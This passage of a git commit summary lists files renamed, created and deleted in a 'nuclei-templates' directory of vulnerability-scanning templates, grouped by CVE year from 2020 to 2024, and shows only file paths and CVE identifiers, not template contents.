nuclei-templates/CVE-2020/{CVE-2020-35713.yaml => cve-2020-35713.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-35749.yaml rename nuclei-templates/CVE-2020/{CVE-2020-3580.yaml => cve-2020-3580.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-35951.yaml => cve-2020-35951.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-36287.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-36365.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-5307.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-7247.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-7943.yaml rename nuclei-templates/CVE-2020/{CVE-2020-7980.yaml => cve-2020-7980.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-8515.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8771.yaml rename nuclei-templates/CVE-2020/{CVE-2020-8982.yaml => cve-2020-8982.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-9047.yaml => cve-2020-9047.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-9402.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-9496.yaml rename nuclei-templates/CVE-2020/{CVE-20200924a.yaml => cve-20200924a.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-1497.yaml => CVE-2021-1497.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-20038.yaml => CVE-2021-20038.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-20114.yaml => CVE-2021-20114.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-20150.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21311.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21402.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21800.yaml rename nuclei-templates/CVE-2021/{cve-2021-21801.yaml => CVE-2021-21801.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-21803.yaml => CVE-2021-21803.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21816.yaml rename 
nuclei-templates/CVE-2021/{cve-2021-21975.yaml => CVE-2021-21975.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-22214.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24226.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24245.yaml rename nuclei-templates/CVE-2021/{cve-2021-24274.yaml => CVE-2021-24274.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24285.yaml => CVE-2021-24285.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24291.yaml => CVE-2021-24291.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24335.yaml => CVE-2021-24335.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24370.yaml rename nuclei-templates/CVE-2021/{cve-2021-24472.yaml => CVE-2021-24472.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24488.yaml rename nuclei-templates/CVE-2021/{cve-2021-24495.yaml => CVE-2021-24495.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24510.yaml rename nuclei-templates/CVE-2021/{cve-2021-24750.yaml => CVE-2021-24750.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24910.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24926.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24947.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24991.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25052.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25055.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25074.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25075.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25085.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25111.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25112.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25118.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25120.yaml rename nuclei-templates/CVE-2021/{cve-2021-26086.yaml => CVE-2021-26086.yaml} (100%) delete 
mode 100644 nuclei-templates/CVE-2021/CVE-2021-26598.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-26702.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-27309.yaml rename nuclei-templates/CVE-2021/{cve-2021-27310.yaml => CVE-2021-27310.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-27519.yaml rename nuclei-templates/CVE-2021/{cve-2021-27931.yaml => CVE-2021-27931.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28377.yaml rename nuclei-templates/CVE-2021/{cve-2021-29484.yaml => CVE-2021-29484.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-30049.yaml => CVE-2021-30049.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-31755.yaml => CVE-2021-31755.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31800.yaml rename nuclei-templates/CVE-2021/{cve-2021-32618.yaml => CVE-2021-32618.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-32682.yaml => CVE-2021-32682.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-3297.yaml => CVE-2021-3297.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-33044.yaml => CVE-2021-33044.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-33357.yaml => CVE-2021-33357.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-3377.yaml => CVE-2021-3377.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-34640.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-35587.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-36450.yaml rename nuclei-templates/CVE-2021/{cve-2021-3654.yaml => CVE-2021-3654.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-36749.yaml => CVE-2021-36749.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-37416.yaml rename nuclei-templates/CVE-2021/{cve-2021-38751.yaml => CVE-2021-38751.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39211.yaml rename nuclei-templates/CVE-2021/{cve-2021-39433.yaml => CVE-2021-39433.yaml} (100%) create mode 100644 
nuclei-templates/CVE-2021/CVE-2021-40150.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40323.yaml rename nuclei-templates/CVE-2021/{cve-2021-41349.yaml => CVE-2021-41349.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-41691.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42063.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42071.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-43062.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-44077.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-44515.yaml rename nuclei-templates/CVE-2021/{cve-2021-44848.yaml => CVE-2021-44848.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45428.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46379.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46381.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-46418.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-46419.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46422.yaml rename nuclei-templates/CVE-2021/{CVE-2021-20031.yaml => cve-2021-20031.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-20124.yaml => cve-2021-20124.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-20150.yaml rename nuclei-templates/CVE-2021/{CVE-2021-20167.yaml => cve-2021-20167.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-20792.yaml => cve-2021-20792.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-21307.yaml => cve-2021-21307.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21311.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21402.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21800.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21816.yaml rename nuclei-templates/CVE-2021/{CVE-2021-21973.yaml => cve-2021-21973.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-21978.yaml => cve-2021-21978.yaml} (100%) rename 
nuclei-templates/CVE-2021/{CVE-2021-22053.yaml => cve-2021-22053.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-22214.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24226.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24235.yaml => cve-2021-24235.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24237.yaml => cve-2021-24237.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24245.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24288.yaml => cve-2021-24288.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24298.yaml => cve-2021-24298.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24316.yaml => cve-2021-24316.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24320.yaml => cve-2021-24320.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24340.yaml => cve-2021-24340.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24370.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24389.yaml => cve-2021-24389.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24406.yaml => cve-2021-24406.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24488.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24510.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24746.yaml => cve-2021-24746.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24762.yaml => cve-2021-24762.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24910.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24926.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24947.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24987.yaml => cve-2021-24987.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24991.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25052.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25055.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-25074.yaml delete mode 100644 
nuclei-templates/CVE-2021/cve-2021-25075.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25085.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-25111.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25112.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25118.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25120.yaml rename nuclei-templates/CVE-2021/{CVE-2021-25281.yaml => cve-2021-25281.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-25646.yaml => cve-2021-25646.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-26247.yaml => cve-2021-26247.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-26475.yaml => cve-2021-26475.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-26598.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-26702.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-27309.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-27519.yaml rename nuclei-templates/CVE-2021/{CVE-2021-27561.yaml => cve-2021-27561.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-27748.yaml => cve-2021-27748.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-28377.yaml rename nuclei-templates/CVE-2021/{CVE-2021-29203.yaml => cve-2021-29203.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-29490.yaml => cve-2021-29490.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-29622.yaml => cve-2021-29622.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-3019.yaml => cve-2021-3019.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-31800.yaml rename nuclei-templates/CVE-2021/{CVE-2021-3223.yaml => cve-2021-3223.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-32305.yaml => cve-2021-32305.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-32819.yaml => cve-2021-32819.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-33544.yaml => cve-2021-33544.yaml} (100%) rename 
nuclei-templates/CVE-2021/{CVE-2021-33564.yaml => cve-2021-33564.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-3374.yaml => cve-2021-3374.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-33904.yaml => cve-2021-33904.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-34370.yaml => cve-2021-34370.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-34640.yaml rename nuclei-templates/CVE-2021/{CVE-2021-34805.yaml => cve-2021-34805.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-35265.yaml => cve-2021-35265.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-35464.yaml => cve-2021-35464.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-35587.yaml rename nuclei-templates/CVE-2021/{CVE-2021-36260.yaml => cve-2021-36260.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-36380.yaml => cve-2021-36380.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-36450.yaml rename nuclei-templates/CVE-2021/{CVE-2021-37216.yaml => cve-2021-37216.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-37416.yaml rename nuclei-templates/CVE-2021/{CVE-2021-37538.yaml => cve-2021-37538.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-37589.yaml => cve-2021-37589.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-37704.yaml => cve-2021-37704.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-39211.yaml rename nuclei-templates/CVE-2021/{CVE-2021-39226.yaml => cve-2021-39226.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-39320.yaml => cve-2021-39320.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-39327.yaml => cve-2021-39327.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-40150.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-40323.yaml rename nuclei-templates/CVE-2021/{CVE-2021-40438.yaml => cve-2021-40438.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-40859.yaml => cve-2021-40859.yaml} (100%) rename 
nuclei-templates/CVE-2021/{CVE-2021-40870.yaml => cve-2021-40870.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-41277.yaml => cve-2021-41277.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-41293.yaml => cve-2021-41293.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-41649.yaml => cve-2021-41649.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-41691.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41773.yaml rename nuclei-templates/CVE-2021/{CVE-2021-41826.yaml => cve-2021-41826.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-42063.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42071.yaml rename nuclei-templates/CVE-2021/{CVE-2021-42192.yaml => cve-2021-42192.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42258.yaml => cve-2021-42258.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42551.yaml => cve-2021-42551.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42565.yaml => cve-2021-42565.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42566.yaml => cve-2021-42566.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-43062.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-44077.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-44515.yaml rename nuclei-templates/CVE-2021/{CVE-2021-45043.yaml => cve-2021-45043.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-45232.yaml => cve-2021-45232.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-45428.yaml rename nuclei-templates/CVE-2021/{CVE-2021-46005.yaml => cve-2021-46005.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-46379.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46381.yaml rename nuclei-templates/CVE-2021/{CVE-2021-46387.yaml => cve-2021-46387.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-46422.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0140.yaml delete mode 100644 
nuclei-templates/CVE-2022/CVE-2022-0148.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0149.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0165.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0271.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0281.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0381.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0422.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0437.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0594.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0599.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0653.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0656.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0954.yaml => CVE-2022-0921.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0952.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0963.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1040.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1392.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1439.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1724.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1904.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1906.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-21371.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-21500.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-21661.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-21705.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2187.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-22963.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-22972.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23808.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23881.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-24124.yaml create 
mode 100644 nuclei-templates/CVE-2022/CVE-2022-2414.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2446.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24681.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2488.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24899.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-25323.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-25568.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-26135.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26233.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2633.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26960.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-27849.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28079.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29013.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29014.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29301.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29303.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29383.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29455.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29464.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-30777.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31137.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31268.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31793.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32026.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32409.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32430.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-34265.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-36883.yaml delete mode 100644 
nuclei-templates/CVE-2022/CVE-2022-41040.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0140.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0148.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0149.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0165.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0201.yaml => cve-2022-0201.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-0271.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0281.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0381.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0422.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0432.yaml => cve-2022-0432.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-0437.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0594.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0599.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0653.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0656.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0952.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0963.yaml rename nuclei-templates/CVE-2022/{CVE-2022-1020.yaml => cve-2022-1020.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-1040.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1392.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1439.yaml rename nuclei-templates/CVE-2022/{CVE-2022-1609.yaml => cve-2022-1609.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-1724.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1904.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1906.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-21371.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-21500.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-21705.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-2187.yaml rename 
nuclei-templates/CVE-2022/{CVE-2022-22536.yaml => cve-2022-22536.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-22963.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-22972.yaml rename nuclei-templates/CVE-2022/{CVE-2022-23178.yaml => cve-2022-23178.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-23347.yaml => cve-2022-23347.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-23779.yaml => cve-2022-23779.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-23808.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23881.yaml rename nuclei-templates/CVE-2022/{CVE-2022-24112.yaml => cve-2022-24112.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-24124.yaml rename nuclei-templates/CVE-2022/{CVE-2022-24260.yaml => cve-2022-24260.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-24681.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-2488.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-24899.yaml rename nuclei-templates/CVE-2022/{CVE-2022-24990.yaml => cve-2022-24990.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-25323.yaml rename nuclei-templates/CVE-2022/{CVE-2022-26134.yaml => cve-2022-26134.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-26135.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26233.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26960.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-27849.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28079.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29014.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29301.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29303.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-29383.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-29455.yaml delete mode 100644 
nuclei-templates/CVE-2022/cve-2022-29464.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-30777.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31268.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31793.yaml rename nuclei-templates/CVE-2022/{CVE-2022-32007.yaml => cve-2022-32007.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-32025.yaml => cve-2022-32025.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-32026.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32409.yaml rename nuclei-templates/CVE-2022/{CVE-2022-34047.yaml => cve-2022-34047.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-35416.yaml => cve-2022-35416.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-36883.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-0297.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-23333.yaml rename nuclei-templates/CVE-2023/{Cve-2023-23752.yaml => CVE-2023-23752.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-25194.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-26256.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-2825.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-38992.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-51467.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-1183.yaml rename nuclei-templates/{Other/gradio-CVE-2024-1561.yaml => CVE-2024/CVE-2024-1561.yaml} (100%) rename nuclei-templates/{Other/gradio-CVE-2024-1728.yaml => CVE-2024/CVE-2024-1728.yaml} (100%) create mode 100644 nuclei-templates/CVE-2024/CVE-2024-23167.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-3673.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-37084.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-3899.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-41667.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-45269.yaml create mode 100644 
nuclei-templates/CVE-2024/CVE-2024-45270.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-45429.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-45625.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5561.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5567.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5628.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5789.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5867.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5869.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5870.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5884.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6020.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-6088.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6544.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6792.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6888.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6889.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6910.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7132.yaml create 